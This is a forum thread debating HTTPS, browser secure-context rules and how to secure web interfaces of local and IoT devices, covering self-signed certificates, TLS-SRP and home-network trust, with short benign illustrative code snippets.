The people who are pushing back against HTTPS really bug me to be honest. They say silly things like “I don’t care if people see most of my web traffic like when I’m browsing memes.”
That presumes that the ONLY goal of HTTPS is to hide the information transferred. However, you have to recognize that you run JITed code from these sites. And we have active examples of third parties (ISPs, WiFi providers) injecting code into your web traffic. When browsing the web over HTTP you are downloading remote code, JITing it, and running it on every site you visit, unless you are 100% NoScript with no HTTP exceptions. You have no way of knowing where that code actually came from.
Now consider that things like Meltdown and Spectre have JavaScript PoCs. How is this controversial?
My primary concern is local servers ‒ which of course are irrelevant if you are a centralised service provider such as Google.
To provide some context, I'm currently working on a web application where the server is intended to be running inside a home network (where the server requires zero configuration by the user). As of now, some of the JS APIs I'm using are only available if the site is running in a secure context, so the server has to serve the application using HTTPS, otherwise some functionality won't be available. However, it is impossible to obtain a valid TLS certificate for this local connection -- I don't even know the hostname of my server, and IP-based certificates aren't a thing. So basically, to get a "green lock symbol" in the browser, the server would have to generate a random CA and get the user to install it, which comes with its own severe security risks and is not an option.
So my current plan is to have a dual-stack HTTP/HTTPS server, which on first startup generates a random, self-issued certificate. When the server is first accessed using HTTP, the client automatically tries to obtain some resources via HTTPS. If this succeeds, the user is redirected to the HTTPS variant. If it fails due to a certificate error, the user is presented with a friendly screen telling her that upon clicking "next" an ugly error message will appear, and that this is totally fine. Oh, and here's how to permanently store an exception in your browser.
Still, the app will forever be marked as insecure. Although it isn't. It is trivial for the user to verify that the connection is secure by comparing the certificate fingerprint with that displayed by the server program she just started.
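For reference, the fingerprint the server would print is just a hash over the certificate's DER encoding; a minimal Python sketch of producing the browser-style display format (the function name is mine, not from any particular library):

```python
import hashlib

def fingerprint(cert_der: bytes) -> str:
    """SHA-256 fingerprint of a certificate, formatted the way
    browser certificate viewers display it (colon-separated hex)."""
    digest = hashlib.sha256(cert_der).hexdigest().upper()
    return ":".join(digest[i:i + 2] for i in range(0, len(digest), 2))

# The server prints fingerprint(cert_der) to its console on startup;
# the user compares it to the value shown in the browser's
# certificate viewer before storing an exception.
```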
This sucks. It just seems that Google and co don't care about people running their own decentralised infrastructure; and marking your own local servers as "insecure" definitely does not help.
Yes, this reminds me of the Mozilla IoT gateway from yesterday, which seemed to drag exactly that long tail of requirements behind it. Something like:
- We'd like to make an IoT gateway that you can use from a browser.
- To get access to necessary APIs, we have to provide it via HTTPS.
- To get HTTPS we need a certificate. Because no one is going to pay for it, we'll use Let's Encrypt.
- To get a Let's Encrypt cert, we need a verifiable hostname on the public internet. Ok, let's offer subdomains on mozilla-iot.com.
- To verify that hostname, Let's Encrypt needs to talk to the gateway. Ok, let's provide a tunnel to the gateway.
- Now the gateway is exposed to the internet and could be hacked. So we need to continuously update it to close vulnerabilities.
So in the end all your IoT devices are reachable from the internet. But hey, you can use Firefox to turn your lights on!
The real solution to this would be something like TLS-SRP, where you can authenticate both sides of a TLS session with a zero-knowledge password proof (devices could ship with a piece of paper containing the generated password; no need for central servers, remote connections to the mothership, gateways, or certificates, or exposing stuff to the internet, or even any internet connectivity at all).
In simple terms, it allows you to set up a TLS session by both sides proving they know the secret password, without either side exposing it, so a MITM cannot capture it. It is an alternative to the cert model that works very well for network-local devices.
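To make the "both sides prove they know the password without exposing it" part concrete, here is a toy sketch of the SRP-6 algebra in Python. The group parameters are deliberately undersized for readability -- real SRP uses the large safe primes from RFC 5054 -- so this illustrates the math only, not a usable implementation:

```python
import hashlib
import secrets

# Toy group parameters; real SRP uses the RFC 5054 groups.
N = 2**255 - 19  # a prime modulus (far too small for real use)
g = 2
k = 3            # SRP-6 multiplier; SRP-6a derives k = H(N, g) instead

def H(*ints: int) -> int:
    """Hash integers to an integer (simplified from the spec)."""
    h = hashlib.sha256()
    for v in ints:
        h.update(v.to_bytes((v.bit_length() + 7) // 8 or 1, "big"))
    return int.from_bytes(h.digest(), "big")

# Registration: the device ships with the password printed on paper;
# the "server" side stores only the salt and the verifier v.
password = b"printed-on-the-box"
salt = secrets.token_bytes(16)
x = int.from_bytes(hashlib.sha256(salt + password).digest(), "big")
v = pow(g, x, N)

# Handshake: each side sends one public value derived from an
# ephemeral secret (a on the client, b on the server).
a = secrets.randbelow(N)
A = pow(g, a, N)                        # client -> server
b = secrets.randbelow(N)
B = (k * v + pow(g, b, N)) % N          # server -> client
u = H(A, B)                             # both sides compute this

# Both sides derive the same session secret; the password itself
# never crosses the wire, so a MITM has nothing to capture.
S_client = pow((B - k * pow(g, x, N)) % N, a + u * x, N)
S_server = pow((A * pow(v, u, N)) % N, b, N)
assert S_client == S_server
```

Both values reduce to g^(ab + bux) mod N, which an eavesdropper cannot compute without knowing the password-derived x or one of the ephemeral secrets.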
But of course Chrome and Firefox both have zero interest in supporting this use case, despite TLS-SRP kicking around for ages now; they'd much rather have you connect to your own devices via a mediated cloud gateway server, for your own safety of course.
Pre-shared keys are only good for bootstrapping a stronger trust relationship. You could use TLS-SRP to exchange identities and then mutually authenticate each other for the general case. X.509 is not the problem. Centrally managed trust hierarchies are.
Mozilla does though. So if their plan is to "offer subdomains on mozilla-iot.com" then they just need to set it up so that their infrastructure will fulfill the DNS challenge for the user's device when it requests a new cert.
Also: if we don't use the domain registration system to proxy for individual sites and presence on the Internet, then what alternatives might be substituted?
Note that domains don't solve the problem of a third-party controlling your point-of-access or presence, they only move it elsewhere.
I'd say that in the world we live in, getting a domain is as useful as getting a passport. It costs a bit of money to get and renew and is a bit of a hassle, but it opens a lot of doors.
This seems like it's going in circles, but: if you self-sign, modern browsers display a big scary warning. If you're making a device or software meant to live behind a firewall and be accessed from a browser, users will either have to install your CA in their browsers or deal with the big scary warning. Both of which are bad.
> chances are that you don't provide service to normal users. Or to users at all besides yourself.
I think that's the point. Creating friction that scares normie users when people are using web UIs on local networks puts non-cloud based products at a disadvantage against the centralized giants.
Though there are a couple of technical options to make this work, the thing I realised many years ago is that if you want to use internet technology you need to be connected to the internet. Anything else is just an endless headache.
If you are sure that you don't want your IoT devices to be reachable from the internet, don't use the internet protocol to talk to them, don't use DNS, web browsers, etc.
Just create a new local protocol (or switch back to IPX)
It really feels like you're throwing in the towel. The internet is designed specifically to allow federation between forests of hosts. That's what routers do. Browser vendors need to get their heads out of the fucking cloud and stop coercing people into relying solely on global TLS. I think TLS is wildly misunderstood. The whole global certificate thing only works for global communication. Global hosts should be your first point of contact, and from there you should be able to leverage global TLS to bootstrap more intimate trust relationships... to make informed decisions about the trust relationships you want to establish. Browsers need to facilitate this, not do everything possible to prevent you from owning your trust. If your browser is only able to communicate globally, that's not the internet's fault. It's not TLS's fault (TLS is designed to allow clients to choose who they trust). That's a failure of your browser to support your diverse use case.
If you like tilting at windmills then go ahead. Since forever people have written software that assumes a global internet.
However today the situation is much worse. The global internet is a very hostile environment. Everybody who writes software that has to work on the internet has to assume the worst.
If there are modes in a piece of software that assume the network can be trusted, then you can be sure that some attacker will try to activate that mode.
You cannot assume that the users of a piece of software have any idea how the internet works. If they can solve an immediate problem by disabling security, they will.
So, over time just about any piece of software that wants to support secure use on the internet will come with built-in trust anchors that are very hard to change.
In browsers this trend is quite visible. But the same trend, though less visible, is going on in DNS.
E-mail is a bit of a mess. But the basic features are there. Just not a lot of adoption.
To sum it up, users don't want to know about internet security. They want their devices to work securely at a random open wifi network. Devices have a hard time figuring out if they are in a trusted environment. So the best way forward is to assume all environments are untrusted and require encryption everywhere.
My issue was with you suggesting people abandon security if they don't want a public internet connection.
I think the global TLS system works great when you're in a global context. But now the internet has proliferated and it's infecting people's homes. It turns out people _don't want_ to be in that hostile global context when they're at home. They want a context that is private. They want to isolate their home from the firehose of global bullshit out there.
I think we've passed an inflection point and we're seeing a revival of attention to home networking. Sure, for the last 15 years all I connected to my wifi was my laptop, and that's pretty useless without the global internet. But now people have IoT things. Door locks, ovens, toilet paper, you name it. Why the hell would anyone want those things phoning home to a remote server all the time? Why does it even need to be publicly routable? Maybe it does need limited connectivity, so strong interactive controls allowing you to federate what goes in and out are necessary. More than ever, the _integrity_ of your home is also the integrity of your network. Your network is an appliance now. It is the lifeblood of your home.
People deserve to be able to administrate their personal enclaves as they see fit and do it securely. The best way to prevent someone from remotely unlocking my doors is to eliminate the remote path to the door lock. Did you forget that we've come rather far in securing layer 2? People _can_ and _should_ trust their home network. Not recklessly, but private networks are not a fairy tale.
Finally, don't patronize users. The users of today are tomorrow's grandmas. It's not unreasonable to expect that we can slowly adapt user expectations and understanding of the security of their software. I'm not saying you don't have a point, but I think it's a disservice to users to treat them all like idiots.
> They want a context that is private. They want to isolate their home from the firehose of global bullshit out there.
With all due respect, over the past fifteen years of trying to secure corporate networks, we've learned the hard way that this simply isn't a realistic goal. Having a hard outer shell and a squishy center just leaves the entire network vulnerable, because it's simply not possible to isolate yourself from the badness of the outside world. As soon as you let anyone in who's ever spoken to the hostile outside world, they bring the hostile outside world in with them.
We can't keep pretending that we can keep home networks isolated from the rest of the world when many of the computers in those networks move freely between the global Internet and the private home intranet. All connected devices are part of the global Internet whether or not we want them to be, and whether or not their connections are persistent.
I think we're arguing similar things. I'm not saying we only need a hard outer shell. I'm arguing that we _need_ defense in depth. And that depth should include all scopes of the internet protocol, not just global. You _should_ be able to run TLS locally, so that if some global thing does get in, it now has to penetrate another security/application layer too. I should be able to tell my browser to trust these certificates for global IPs and these other ones for my home site. Why not run IPsec in your home while you're at it too, so it's even harder for a remote thing to pivot.
People can administrate their personal enclaves as they see fit. There are a number of operating systems that you can rebuild from source. You can just create your own root CA and add it to your browsers. You can run your own root DNS zone.
Most people have no clue about computer security and don't want to get one. Tomorrow's grandmas will know as little about how their computers are attacked as today's grandmas.
And they don't want to know. They want technology that is safe to use.
We know from experience that a network where devices trust each other is a disaster waiting to happen. So let's kill that model. All devices have to survive in the open internet. Because if they don't, somebody will figure out a way to attack them.
I think we're talking past each other at this point. I want security both globally and locally. I want to be able to tell my browser who it should trust and how paranoid it should be in each context. If I go through the work of recompiling a bunch of software with custom trust anchors, I don't want it all to be for naught because in the last mile my browser says "I'm lost, I only understand global TLS".
I LOVE the idea of NAT-less global internet. It's why I love IPv6. At that level anything that wants to participate should be secure and "go Chrome" for leading the charge. I even think firewalls for global IPv6 are stupid. If you're global you're global no amount of silly packet filtering rules is gonna change that.
But that's not the end-all. I don't want my entire house to stop working because I got a new ISP and I have a few days of downtime. Or, more likely, because my ISP went down because they oversell bandwidth and haven't updated their routing hardware in 15 years. Maybe I don't want my file server with all my family photos globally addressable. Maybe I don't want my kids on the global internet at certain times. The point is I know what's best for my house. I'm sick of the old IPv4 mindset where the only reasonable model is centralized global trust (see, we agree that's been the status quo).
> Global hosts should be your first point of contact and from there you should be able to leverage global TLS to bootstrap more intimate trust relationships... to make informed decisions about the trust relationships you want to establish.
Part of setting up an account with a web service or IoT device provider or whatever should be acquiring their certificate authority. However, instead of a single-bucket, OS-level root trust store, browsers should empower users to whitelist which sites they trust that authority to, well, have authority over. You trust Google's CA for google.com. Or maybe you don't.
At the application level, trust should be managed by the application provider and the user. Their certificate authority can issue whatever certificates it wants for whatever kind of network topology or application use cases or whatever else they need to support. As a user, you're either still using a browser, or you've at this point switched to their native app, or you've got their JS helpers loaded, or whatever. Their application logic can manage all the certificate crap so that users are minimally encumbered by it. If you're talking to local network devices, their application logic would issue certificates for whatever scope of IPv6 addresses you're using. Maybe your fancy device is running DNS; their thing issues certs for your scope's site, etc.
You can even do mutual TLS now, because their authority can issue each install of their app its own certificate. Browsers should support client certs too. Navigating to foo.com using a scoped IPv6 address? You're prompted to select the identity you wish to use. Your browser remembers your choice for that scope. The CA is only valid for your blessed names, scope-aware.
> Their certificate authority can issue whatever certificates it wants for whatever kind of network topology or application use cases or whatever else they need to support.
But that means that other customers can get a trusted certificate for the exact same IP address, right?
> If you are sure that you don't want your IoT devices to be reachable from the internet, don't use the internet protocol to talk to them, don't use DNS, web browsers, etc.
What utter nonsense.
TCP/IP works fine on a local network
DNS works fine on a local network
HTTP(S) works fine on a local network
Web Browsers work fine on a local network
After all the internet is nothing more than a collection of connected networks.
If I have no need for anything within my local network (or subset of that network) to be routable from the internet then I put a firewall in the way, it doesn't mean I don't use the same tools and protocols.
TCP/IP on a local network will make mobile devices think they are on a captive portal.
DNSSEC will prevent you from serving local answers for signed zones. The DNS root zone is signed. So the IETF at the moment has a hard time figuring out which zones need to stay unsigned to allow these kinds of local answers.
HTTP is not secure, so that is going the way of telnet.
HTTPS is what we are discussing here. Without a valid cert, don't expect browsers to support you much longer.
Yes, you can create your own little internet island. But don't complain if any software fails to work in that environment.
> TCP/IP on a local network will make mobile devices think they are on a captive portal.
No, that's the phone making an HTTP call to a server on the internet to try to work out if it's behind a captive portal; all of TCP/IP still functions perfectly fine within an internal network with no WAN access.
> DNSSEC will prevent you from serving local answers for signed zones. The DNS root zone is signed. So the IETF at the moment has a hard time figuring out which zones need to stay not signed to allow these kinds of local answers.
The devices are on a local network; they're not making requests to things outside the network. Even if you do need outside access for resolution, you can still happily use a DNS forwarder, with your local DNS served up locally and any outside DNS (including DNSSEC) queries forwarded where they need to go.
> HTTP is not secure, so that is going the way of telnet.
That's neither here nor there, it still works fine in the context of a local network.
> HTTPS is what we are discussing here. Without a valid cert, don't expect browsers to support you much longer.
A cert is as valid as my cert store thinks it is, again, still works on an internal network.
> Yes, you can create your own little internet island. But don't complain if any software fails to work in that environment.
By "own internet island" you mean a local network? Sure it's more advanced than your nan's local network but it's still a local network in which the IP part of TCP/IP still works absolutely fine. Maybe you come from the land where your mongo instance needs a public IP, or that your lightbulbs can be used to pivot onto your home network. I don't. This is basic network design. Maybe the shitty software/hardware you're running shouldn't assume it will always be connected to the internet directly.
The goal is that you can build a device that your grandma can put at home, which never connects to a remote server, which she can connect to from her browser, which just works, never shows an annoying HTTPS warning, never requires enabling custom CAs, and provides all functionality of the browser, without being marked as "not secure".
That is the goal: All the functionality of e.g. a Nest device, without ever sending a single packet outside of your LAN.
(Disclaimer: For my own IoT projects, of course I use a special domain with DNS delegation and Let's Encrypt certificates, and HSTS preloaded)
> never connects to a remote server, which she can connect to from her browser, which just works, never shows an annoying HTTPS warning, never requires enabling custom CAs, and provides all functionality of the browser, without being marked as "not secure".
Right, do you have a proposal for how to accomplish this? If you don't want to require an internet connection, I think trusting a self-signed cert is the best way to go, otherwise owning a domain name + letsencrypt is good if you're ok connecting to the internet.
What I think could really do good is some browser-supported protocol specifically made for identifying devices on a LAN.
E.g., imagine some UPnP-style broadcast where a device announces a public key, human-readable name and some type/capability information.
Browsers listen for broadcasts and show users a notification once they discover an unseen device. Once confirmed, they can identify the device by its public key and also use it to establish encrypted connections.
You could also define out-of-band methods to share the key, e.g. via an on-device wifi hotspot, NFC, a USB plug or a QR code printed on the device.
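As a strawman for what such an announcement could look like, here is a Python sketch; the payload format and field names are entirely made up for illustration, since nothing like this is standardized:

```python
import hashlib
import json

# Hypothetical broadcast payload for LAN device discovery. A device
# would send this over UDP broadcast/multicast; the browser (or a
# helper) would parse it and, after the user confirms the device,
# pin the key fingerprint as its identity.
def make_announcement(name: str, device_type: str, pubkey_der: bytes) -> bytes:
    return json.dumps({
        "name": name,                                   # shown to the user
        "type": device_type,                            # capability hint, e.g. "light"
        "key": hashlib.sha256(pubkey_der).hexdigest(),  # pinned identity
    }).encode()

def parse_announcement(payload: bytes) -> dict:
    msg = json.loads(payload)
    for field in ("name", "type", "key"):
        if field not in msg:
            raise ValueError(f"announcement missing field: {field}")
    return msg
```

The same payload could be carried over any of the out-of-band channels mentioned above (NFC, QR code, USB) since it is just a self-describing blob keyed on the public-key fingerprint.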
Mozilla's Web-of-Things spec seems to show at least a willingness to work on this. Though right now they seem to re-solve exactly all the already solved problems and tackle none of the unsolved.
...or you could simply treat HTTP in local networks as a secure origin and be done with it.
I agree, though instead of "public key" I would just say "self-signed cert".
> ...or you could simply treat HTTP in local networks as a secure origin and be done with it.
I think this is a lot harder than it sounds. What's a "local network"? Is a coffee shop or public wifi a local network? How does the browser know? How do you know a rogue IoT device isn't doing IP spoofing?
Right, yeah, browsers are not guaranteeing any security on the local network.
If self-signed is not an option, then I think an internet connection and domain name are required. (Which seems to me is totally fine. That's the whole point of IoT)
I totally agree. Either have it securely connected to the internet, or not at all. The fact that something is on your LAN is just an implementation detail and shouldn’t be relied upon for security.
Is the fact that your physical door locks and keys are only unique within your local region just an implementation detail? No, it's not. It's conceptually the same: keys and locks are not globally secure. They're only locally secure.
Also IPv6: everything gets a globally routable address. Great, so why do we need anything else? Well, it turns out that in order to support all the different modes of network operation and all the different topologies and use cases, the Internet Protocol needs to support non-global scopes too. Arguing that you can't have e.g. link-local security is absurd, and really quite green from a networking professional's perspective.
Oh, also: IPsec is part of IPv6, not just an afterthought like it was for IPv4. This makes it even more likely we'll see trusted network scopes sooner rather than never.
That is basically my point. People need to have ways to create local enclaves so it's impossible for packets to ever make their way into your zone. And once you do that, local security is perfectly reasonable and desirable.
HTTPS only protects data in transit between the server and your device. A local network works just fine for providing the same protection. It's not like an internet attacker can spoof a 192.168.x.x address on my LAN, or sniff the traffic to or from my server.
Possibly a rogue IoT device could spoof an IP address. But that's probably not going to happen to someone who knows what they're doing. Browsers don't know if the network is trusted and can't assume that LAN IPs are safe.
It seems to me the best options are either trusting a self-signed cert (on every computer that needs access) or pay for a domain name and use letsencrypt to get a cert. I do think it's unfortunate that you now need to pay money just to do things like this on your own network, but I don't see a better way. It's either paying for a domain name or needing to explicitly trust the device.
I don't think there's a way to do what you want in a secure manner.
I think fundamentally your issue here is with secure contexts, not with the site labeling. In the end, you can have a site like you describe, but you have to avoid using APIs that require secure contexts.
Any sort of avoidance of this, as by the method you describe ("please ignore the ugly warning you are about to see") is a mistake, because you're helping to train the users to ignore these messages.
> Still, the app will forever be marked as insecure. Although it isn't. It is trivial for the user to verify that the connection is secure by comparing the certificate fingerprint with that displayed by the server program she just started.
Is it, though? Assuming your server hasn't been compromised (nobody is monitoring it to make sure!), and assuming that the self-signed cert cannot be easily exfiltrated, and assuming that they don't do the same thing the next time they get an ugly warning from chase-bank.ru because they're sure that it's spurious -- then maybe?
> In the end, you can have a site like you describe, but you have to avoid using APIs that require secure contexts.
While that might be an option now, it's not going to be viable. Browser vendors have agreed to make all new JS APIs -- mostly independent of their security implications -- available to secure contexts only [1]. Even now, you cannot use the Crypto API -- which is entirely implementable in plain JS, albeit slower and with higher energy consumption -- without secure contexts. Or you cannot raise the IndexedDB storage limit for your application above a certain threshold without a secure context (which is exactly my problem, I want users to be able to temporarily store a few hundred MB on their mobile device).
> Any sort of avoidance of this, as by the method you describe ("please ignore the ugly warning you are about to see") is a mistake, because you're helping to train the users to ignore these messages.
I completely agree. I understand the implications of me doing this and I honestly don't want to.
I guess what I'm complaining about mostly boils down to a UX issue. It would be near-trivial for browser vendors to add the following to the error page if they detect a self-signed cert on a local connection: "This site seems to be served from the local network. If you are trying to access your own network infrastructure, please make sure the following fingerprint matches the one displayed by the application you are trying to access <fingerprint>, <autogenerated fingerprint art>. If you are unsure, please click 'Cancel'.".
That would solve the problem, no landing page from my application required.
> Is it, though?
You're right, there are a lot of assumptions I'm making here. However, I see no reason why my local HTTPS site should be displayed as less secure (red cross, red text in the URL bar) than a local HTTP site.
> I see no reason why my local HTTPS site should be displayed as less secure (red cross, red text in the URL bar) than a local HTTP site.
Exactly, that's why browsers are trying to move in the direction of making HTTP sites appear as less secure.
> I guess what I'm complaining about mostly boils down to a UX issue. It would be near-trivial for browser vendors to add the following to the error page if they detect a self-signed cert on a local connection: "This site seems to be served from the local network. If you are trying to access your own network infrastructure, please make sure the following fingerprint matches the one displayed by the application you are trying to access <fingerprint>, <autogenerated fingerprint art>. If you are unsure, please click 'Cancel'.".
I totally agree it's a UX issue, but I don't see a good solution. Unfortunately your browser doesn't know if you're on "your own network infrastructure" and not at a coffee shop. It needs to be on the safe side and assume it's not a trusted network.
Maybe the browser should require you to type in the fingerprint of the key.
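If a browser did ask the user to type in the fingerprint, the comparison itself is straightforward to do safely; a small sketch (function name is mine), normalizing whatever separator style the user happens to type:

```python
import hmac

def fingerprints_match(typed: str, actual_hex: str) -> bool:
    """Compare a user-typed fingerprint against the certificate's
    actual hex digest, ignoring colons, spaces, and case.
    hmac.compare_digest avoids leaking how long a matching prefix
    was via timing."""
    normalized = typed.replace(":", "").replace(" ", "").lower()
    return hmac.compare_digest(normalized, actual_hex.lower())
```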
Wow -- you're right, the overreach in "secure contexts" is astonishing. It looks like [1] is the main thread discussing this policy. The notion of "internal/isolated network services" is mentioned in one comment but never addressed, other than pointing out the difficulty of getting a cert for such a service. I think it's probably worth jumping into that discussion before the policy is set in stone.
Thinking on this further, the storage one makes sense for secure contexts, because allowing that for insecure contexts would mean that by spoofing the DNS of a site, I could steal its information. I'm not certain how secure the data that you store would be, but if it were, say, camera footage or something, it would be possible for it to be extracted from the user's phone by a malicious website out of your control.
I don't know if this problem is soluble -- at least a self-signed certificate would mean that the certificate would have to be exfiltrated in order to do this, assuming the browsers key the indexedDB to the certificate fingerprint, which would indicate a degree of compromise that most likely means that the data could be stolen directly from the device.
If you don't mind being more specific, what kind of data would you be storing on the phone? Is it just for caching purposes? It seems like it might be better for the data to be fetched from the device on demand rather than stored on the phone, even if this causes a performance hit, to avoid the possibility of leaking the data to untrusted parties.
> If you don't mind being more specific, what kind of data would you be storing on the phone?
Sure, my particular use-case is a media management/playback application (think web-based audio player; like Plex, Ampache, Spotify) that is intended to be used with a large personal library of audio files (in the order of a hundred thousand files, about 1 TB of data). The application has an offline-mode (via ServiceWorkers, everything being REST, content addressed and infinitely cacheable), where the connected client can request to "pin" a certain playlist/filter. Upon request, all media files with that filter will be transcoded/downloaded onto the client and are available even when having no connection. So it's not really any data that needs to be kept secure (still, all media blobs are encrypted anyhow to allow public caching -- for internet hosted instances -- without having to fear IP issues).
Let's maybe hope that they'll make an exception for the RFC1918/4193 ranges. Of course, the other side of the coin is that even a "private" network could be anything from your private home to your workplace intranet to an airport wi-fi hotspot, and can't be assumed to be safe from snooping/injection.
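Checking whether an address falls in those ranges is the easy part; the hard part, as noted, is that "private" says nothing about "trustworthy". A Python sketch of the range check:

```python
import ipaddress

def is_private_range(addr: str) -> bool:
    """True for RFC 1918 IPv4 ranges and RFC 4193 IPv6 ULAs.
    Note this only says the address is *private*, not that the
    network behind it is trustworthy -- an airport hotspot handing
    out 192.168.x.x addresses matches just the same."""
    ip = ipaddress.ip_address(addr)
    if ip.version == 4:
        return any(ip in ipaddress.ip_network(net) for net in
                   ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16"))
    return ip in ipaddress.ip_network("fc00::/7")
```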
As for your particular hassle, it makes sense to me for a browser to mark sites that mix http/https as insecure from the point of view that once the data is on the plain http page you can no longer be sure that it won't be handed off over an unencrypted connection some place else by some rogue javascript.
Perhaps a rather drastic change like this will lead to more user friendly ways to install self-signed certificates on home networks. Say, a method for routers to discover certificates announced by devices on the network to list them in its management interface where you can enable or disable them.
> Let's maybe hope that they'll make an exception for the RFC1918/4193 ranges. Of course, the other side of the coin is that even a "private" network could be anything from your private home to your workplace intranet to an airport wi-fi hotspot, and can't be assumed to be safe from snooping/injection.
That would be idiotic, not just because untrusted parties can use those addresses, but more importantly because those are more or less terrible hacks that should be avoided completely if possible. You rather should have globally unique addresses on your internal network if you can, which would just break this.
> Perhaps a rather drastic change like this will lead to more user friendly ways to install self-signed certificates on home networks.
That's also not sensible. The whole idea of linking stuff to specific networks is bad. There is no reason why access to a device on your home network should in any way be linked to your client device being connected to that same network. It's the internet, not "the home network and the cloud".
What is needed is a way to establish a trust relationship between two devices that you have control over. Where those devices happen to be connected to the internet should be absolutely irrelevant. There might be an argument that supporting a simplified pairing procedure on a local network would be a good idea--but the point is that once the trust relationship is established, you should be able to move your client device to a different network on the other side of the planet and still be able to talk to your device on your home network.
> but more importantly because those are more or less terrible hacks that should be avoided completely if possible
Seems quite unavoidable with IPv4, or what is the hack you're referring to specifically?
> That's also not sensible. The whole idea of linking stuff to specific networks is bad. There is no reason why access to a device on your home network should in any way be linked to your client device being connected to that same network.
What is the reason against? It's not like the idea of a privately managed network in which you trust all peers is novel or rare. Most people have a network in their home that they manage for themselves or for their family. It's the perfect scope for IoT devices.
> It's the internet, not "the home network and the cloud".
That's an interesting notion, but unfortunately does not reflect reality of use or the design of existing internet protocols, or even the very core concept of the internet: interconnected networks. I have a private network at home. My means to connect devices on this network to the internet is via a gateway which is assigned a single globally unique internet address by my service provider, and a locally unique address on the private network.
If at some point every device has its own global address and is accessible globally, it will be more accurate to assume that something is insecure if it communicates in the plain, but we're not there yet. What the browser is doing now is pretty much assuming an arbitrary level of "better safe than sorry".
> What is needed is a way to establish a trust relationship between two devices that you have control over.
Say, by sharing keys over a network under your control, certified and authorized by a device you trust for pretty much everything else on that network?
> Where those devices happen to be connected to the internet should be absolutely irrelevant.
Agreed, but the current conundrum is that they need to be connected to the internet if you want to use a central certificate authority.
> Seems quite unavoidable with IPv4, or what is the hack you're referring to specifically?
Well, yes, for most people it unfortunately is. But imagine you are one of the lucky ones who do have global IPv4 addresses everywhere. And now someone sells you a product that tells you "sorry, nice IPv4 network that you have there, but you have to install NAT and an RFC1918 network to use this IPv4 product". Not very sensible, is it? The same applies for IPv6 and ULA, obviously.
> What is the reason against?
What would be a reason for limiting the usefulness of your devices?
> It's not like the idea of a privately managed network in which you trust all peers is novel or rare.
Which is fine, but not a sensible assumption to make in an IP product. If you want to use it in a privately managed, trusted network, of course you should be able to, but the idea that an IP device should just refuse to work over IP if your IP network happens to extend beyond your LAN is idiotic. That should be a matter of the network's policy, not of the device's hard-coded policy.
> That's an interesting notion, but unfortunately does not reflect reality of use or the design of existing internet protocols, or even the very core concept of the internet: interconnected networks.
Erm ... that's completely backwards? It unfortunately does not reflect the current use of IPv4 in particular due to NAT everywhere, but that certainly was not part of "the design of existing internet protocols", that was a hack due to lack of addresses.
What came before the internet were separate local (and sometimes not so local) networks: You had all kinds of link-layer protocols, and then various higher-level protocols, usually specific to a given link layer. The whole point of the internet was to add a common abstraction on top of all of those link-layer protocols, precisely to eliminate any distinction between local or remote, ethernet or token ring, modem or ISDN, GSM or CDMA: an addressing layer that erased the distinction. If you had an IP address and the thing you wanted to communicate with had an IP address, you could communicate, even if you were on token ring, your WAN link was ISDN, the backbone was ATM, the peer's WAN link was a dial-in modem and their LAN was ethernet. The point of IP is that you don't have to care; any IP address is as good as any other.
> I have a private network at home. My means to connect devices on this network to the internet is via a gateway which is assigned a single globally unique internet address by my service provider, and a locally unique address on the private network.
Well, yes, unfortunately, that is the case nowadays. That is not how IP was meant to be used, and it's causing massive problems. If it weren't for lack of addresses, your home network should have a globally unique /24 or something (and it did, back in the day).
> If at some point every device has its own global address and is accessible globally, it will be more accurate to assume that something is insecure if it communicates in the plain, but we're not there yet. What the browser is doing now is pretty much assuming an arbitrary level of "better safe than sorry".
Not sure I am getting your point!?
> Say, by sharing keys over a network under your control, certified and authorized by a device you trust for pretty much everything else on that network?
Well, arguably you totally should not trust your router, they tend to be crap security-wise.
But in any case, my point was that at most that should be a pairing mechanism. So, once the trust relationship is established, there should be no need to stay on the local network for further secure communication.
> Agreed, but the current conundrum is that they need to be connected to the internet if you want to use a central certificate authority.
Well, yes?! But the solution is not to hard-code policies that prevent full use of IP.
> Well, yes, for most people it unfortunately is. But imagine you are one of the lucky ones who do have global IPv4 addresses everywhere. And now someone sells you a product that tells you "sorry, nice IPv4 network that you have there, but you have to install NAT and an RFC1918 network to use this IPv4 product". Not very sensible, is it? The same applies for IPv6 and ULA, obviously.
Are you arguing from the assumption that my suggestions and any other form of establishing trust are mutually exclusive? If you're that lucky guy with a global address for your lightbulb, by all means use what's at your disposal to establish a trusted encrypted link between the device and the user in a convenient way. Not sure how that would prevent the vast majority using these on private networks with a different method of authentication and different criteria for trust.
> Erm ... that's completely backwards? It unfortunately does not reflect the current use of IPv4 in particular due to NAT everywhere, but that certainly was not part of "the design of existing internet protocols", that was a hack due to lack of addresses.
So, given the limited address range, it was clearly not designed for every person in the world to have an address, not to mention every appliance in your kitchen. The internet has grown rather organically and has adopted a broader use case. The infrastructure, protocols and best practices used on the internet now reflect this unanticipated use case.
> Well, yes, unfortunately, that is the case nowadays. That is not how IP was meant to be used, and it's causing massive problems. If it weren't for lack of addresses, your home network should have a globally unique /24 or something (and it did, back in the day).
How it was meant to be used is an artefact that stopped mattering some time in the 80s.
> Not sure I am getting your point!?
The point is that flagging plain http websites as "unsafe" makes a lot of assumptions about my network. They're not necessarily unsafe. In one case, it's on my apartment-wide LAN. In another case, it's connected by ethernet directly to the client. Neither of these are particularly exotic topologies.
> But in any case, my point was that at most that should be a pairing mechanism. So, once the trust relationship is established, there should be no need to stay on the local network for further secure communication.
Why not both?
> Well, yes?! But the solution is not to hard-code policies that prevent full use of IP.
Agreed? I'm not sure where you got the idea that I think that any of these things should prevent the full use of IP. Certainly not from anything I've said.
> Are you arguing from the assumption that my suggestions and any other form of establishing trust are mutually exclusive? If you're that lucky guy with a global address for your lightbulb, by all means use what's at your disposal to establish a trusted encrypted link between the device and the user in a convenient way.
Well, if that were a standardized way to establish trust, that necessarily would lead to vendors adopting it at the cost of supporting other kinds of setups?
Also, it is very problematic to overload non-globally-routable addresses (also often misleadingly called "private addresses") with security semantics. While many home setups do have a sort-of security boundary around RFC1918 subnets, there is absolutely no guarantee that that is the case. So not only would such a mechanism break "sane" (i.e., NAT-free) setups, it would also make otherwise perfectly fine and useful setups risky. Have a VPN link to another company that also uses RFC1918 space or ULA, and suddenly your IoT stuff starts trusting that other company. Or you have departments that aren't supposed to trust each other but happen to share a common ULA prefix, and now some devices simply assume trust where none is implied, making otherwise perfectly fine setups impossible to use. Or simply a guest on your network. Or ... whatever else can share non-globally-routed address space with you without any trust implied.
